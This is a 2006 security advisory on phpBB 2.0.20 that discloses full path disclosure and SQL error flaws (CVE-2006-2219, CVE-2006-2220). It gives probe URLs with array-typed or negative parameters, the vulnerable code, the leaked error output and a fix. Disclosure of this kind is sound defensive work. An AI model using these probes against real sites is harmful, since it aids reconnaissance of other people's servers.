[phpBB 2.0.20 Full Path Disclosure and SQL Errors] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 1.5.2006 - -Public: 5.5.2006 from CXSecurity.Com CVE: - - CVE-2006-2219 Full Path Disclosure - - CVE-2006-2220 Sql Errors - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. Full Path Disclosure --- Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into specific functions. For example function htmlspecialchars() ... if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style, &hint_charset, &hint_charset_len) == FAILURE) { return; } ... As you can see there is a protection from formatting input variable. If the variable is other than string, we have error with Full Path Disclosure. Example: http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx - ---Code --- if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) ) { $mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']); } else { $mode = 'joined'; } - ---Code --- - ---Result --- Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486 - ---Result --- http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx - ---Result --- Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487 Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485 Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486 - ---Result --- Problem appears if display_errors==1, but it exists on many websites. (even at php.net). - --- 2. Sql Errors --- Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value is below 0 or above -2^32. Example: http://[HOST]/2020/phpBB2/memberlist.php?start=-1 - ---Code --- $start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0; - ---Code --- - ---Result --- Could not query users DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4 SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50 Line : 151 File : memberlist.php - ---Result --- - --- 3. How to fix --- Turn off display_errors or use function like is_string(). - --- 4. Contact --- Author: Maksymilian Arciemowicz